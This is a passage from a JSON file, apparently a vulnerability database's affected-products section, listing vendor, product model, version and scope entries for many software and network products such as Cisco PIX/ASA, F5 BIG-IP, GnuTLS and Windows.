"model": "linux hppa",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.0"
},
{
"_id": null,
"model": "windows vista enterprise 64-bit edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "java system web server sp9",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "meeting exchange streaming server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "-0"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.10"
},
{
"_id": null,
"model": "unified contact center hosted",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "coat systems blue coat reporter",
"scope": "ne",
"trust": 0.3,
"vendor": "blue",
"version": "9.2.4.1"
},
{
"_id": null,
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "4.0"
},
{
"_id": null,
"model": "pfsense 1.2-rc4",
"scope": null,
"trust": 0.3,
"vendor": "bsdperimeter",
"version": null
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "11052.5"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"_id": null,
"model": "linux enterprise sp2 debuginfo",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16000"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(2)"
},
{
"_id": null,
"model": "syslog-ng premium edition",
"scope": "eq",
"trust": 0.3,
"vendor": "balabit",
"version": "3.0.6"
},
{
"_id": null,
"model": "opensolaris build snv 121",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "hp-ux",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.23"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(2.3)"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6.6"
},
{
"_id": null,
"model": "voice portal sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.7.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.4"
},
{
"_id": null,
"model": "java system web server sp10",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "db2 universal database",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.7"
},
{
"_id": null,
"model": "oracle11g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.0.2.0"
},
{
"_id": null,
"model": "messaging application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "0"
},
{
"_id": null,
"model": "blackberry enterprise server express for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.2"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.6.4"
},
{
"_id": null,
"model": "syslog-ng premium edition 3.2.1a",
"scope": null,
"trust": 0.3,
"vendor": "balabit",
"version": null
},
{
"_id": null,
"model": "sdk 01",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.4"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "2.0"
},
{
"_id": null,
"model": "wireless control system software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "linux enterprise sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "unified contact center express",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.x"
},
{
"_id": null,
"model": "windows vista ultimate 64-bit edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.2.2"
},
{
"_id": null,
"model": "circle",
"scope": "eq",
"trust": 0.3,
"vendor": "voodoo",
"version": "1.1.34"
},
{
"_id": null,
"model": "solaris 8 sparc",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "cosminexus server web edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "4"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.3"
},
{
"_id": null,
"model": "web server 4.3r5",
"scope": "ne",
"trust": 0.3,
"vendor": "zeus",
"version": null
},
{
"_id": null,
"model": "oracle10g personal edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.3"
},
{
"_id": null,
"model": "jboss enterprise web server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5.0"
},
{
"_id": null,
"model": "windows vista enterprise 64-bit edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)9"
},
{
"_id": null,
"model": "opensolaris build snv 124",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "systems insight manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "4.2"
},
{
"_id": null,
"model": "java sdk sr3",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.4.2"
},
{
"_id": null,
"model": "windows server web edition sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "unified ip phone 7940g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "arubaos",
"scope": "ne",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "2.5.6.24"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.0.2"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.2.3"
},
{
"_id": null,
"model": "arubaos",
"scope": "ne",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.4.1.1"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.2.5"
},
{
"_id": null,
"model": "aura communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.13"
},
{
"_id": null,
"model": "etherfast befw11s4 wireless ap cable/dsl router b",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.37.9"
},
{
"_id": null,
"model": "opensolaris build snv 85",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "opensolaris build snv 19",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jboss enterprise web server for rhel server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "51.0"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.7"
},
{
"_id": null,
"model": "linux enterprise sp3 debuginfo",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "wireless location appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.0"
},
{
"_id": null,
"model": "project openssl j",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "weblogic server sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1"
},
{
"_id": null,
"model": "meeting exchange sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "oracle10g enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.5"
},
{
"_id": null,
"model": "java system web server update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "7.03"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.7"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.4"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.1"
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"_id": null,
"model": "messaging application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.1"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.205.0"
},
{
"_id": null,
"model": "windows for itanium-based systems",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0.3"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2.(2.8)"
},
{
"_id": null,
"model": "db2 universal database",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.1.11"
},
{
"_id": null,
"model": "windows xp gold",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.2.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)6"
},
{
"_id": null,
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"_id": null,
"model": "db2 universal database fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.18"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.6"
},
{
"_id": null,
"model": "linux enterprise desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "windows datacenter server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.7"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.2"
},
{
"_id": null,
"model": "java system web server update",
"scope": "ne",
"trust": 0.3,
"vendor": "sun",
"version": "7.07"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.4.1"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "unified communications manager 7.0",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6"
},
{
"_id": null,
"model": "security agent",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0(1.126)"
},
{
"_id": null,
"model": "6.3-release-p11",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "java system application server enterprise edition 2005q1rhel2.1/rhel3",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.1"
},
{
"_id": null,
"model": "opensolaris build snv 74",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.2"
},
{
"_id": null,
"model": "tivoli endpoint manager patch",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.23"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "9.1"
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.0.3"
},
{
"_id": null,
"model": "windows xp 64-bit edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "ucosminexus operator",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "unified callmanager 4.3 sr1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "systems insight manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "5.1"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "1.6.0"
},
{
"_id": null,
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)71"
},
{
"_id": null,
"model": "ironport web security management appliance m-series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "opensolaris build snv 111b",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0.1"
},
{
"_id": null,
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "siparator",
"scope": "ne",
"trust": 0.3,
"vendor": "ingate",
"version": "4.8.1"
},
{
"_id": null,
"model": "web server r5",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.1"
},
{
"_id": null,
"model": "windows vista sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.2"
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "2.2"
},
{
"_id": null,
"model": "opensolaris build snv 29",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "ucosminexus service platform",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.8(0)"
},
{
"_id": null,
"model": "project openssl a",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "windows vista business 64-bit edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "0"
},
{
"_id": null,
"model": "multi network firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "mandrakesoft",
"version": "2.0"
},
{
"_id": null,
"model": "enterprise linux supplementary server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.0.8"
},
{
"_id": null,
"model": "7.1-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "video surveillance media server software",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.1"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.8.1"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "wide area application services",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "rpath",
"version": "1"
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "11052.0.2"
},
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.12.3"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "linux enterprise software development kit",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "esx server esx410-201101201",
"scope": "ne",
"trust": 0.3,
"vendor": "vmware",
"version": "4.1"
},
{
"_id": null,
"model": "windows xp media center edition sp3",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "oracle10g personal edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.5"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.01"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(4)"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0"
},
{
"_id": null,
"model": "cosminexus server standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "4"
},
{
"_id": null,
"model": "coat systems packetshaper",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "17000"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.8"
},
{
"_id": null,
"model": "matrixssl",
"scope": "eq",
"trust": 0.3,
"vendor": "matrixssl",
"version": "1.8.7"
},
{
"_id": null,
"model": "rsa data protection manager appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "emc",
"version": "3.2.4.2"
},
{
"_id": null,
"model": "windows server enterprise edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "security agent for icm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.639"
},
{
"_id": null,
"model": "enterprise linux desktop client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "java system web server sp6",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4.8"
},
{
"_id": null,
"model": "opensolaris build snv 105",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0.0.96"
},
{
"_id": null,
"model": "unified communications manager 6.1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "windows xp media center edition",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"_id": null,
"model": "-pre-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"_id": null,
"model": "linux lts i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "messaging storage server",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "windows server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "ciscoworks common services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.0.4"
},
{
"_id": null,
"model": "wireless control system software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2"
},
{
"_id": null,
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"_id": null,
"model": "java system web proxy server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "4.0.12"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.2"
},
{
"_id": null,
"model": "firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "ingate",
"version": "4.8.1"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "1.5.0"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(3)"
},
{
"_id": null,
"model": "digital media manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "cms server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "16.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.02"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0"
},
{
"_id": null,
"model": "nx-os",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0"
},
{
"_id": null,
"model": "java system web server sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "windows vista home premium sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.8.2"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.18"
},
{
"_id": null,
"model": "java system directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.2"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.3"
},
{
"_id": null,
"model": "http server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.2"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.x"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.4.3"
},
{
"_id": null,
"model": "windows xp embedded",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "linux enterprise sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "cosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0.1.4"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.16"
},
{
"_id": null,
"model": "project openssl 0.9.8g",
"scope": null,
"trust": 0.3,
"vendor": "openssl",
"version": null
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "5.2.6"
},
{
"_id": null,
"model": "identity management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4.3"
},
{
"_id": null,
"model": "os/400 v6r1m1",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "1.6"
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.3"
},
{
"_id": null,
"model": "windows vista home basic 64-bit edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "os/400 v5r4m5",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "-release-p9",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"_id": null,
"model": "wireless control system software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.95"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.4.3"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.3"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"_id": null,
"model": "windows server standard edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "linux alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "nx-os",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "java system web server sp10",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "linux enterprise server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "db2 universal database fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.17"
},
{
"_id": null,
"model": "ons series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "155000"
},
{
"_id": null,
"model": "application velocity system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "31205.0.1"
},
{
"_id": null,
"model": "windows vista business sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "wireless lan control m",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.17"
},
{
"_id": null,
"model": "cvlan",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "ironport email security appliance c-series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.6"
},
{
"_id": null,
"model": "windows professional sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.2.1"
},
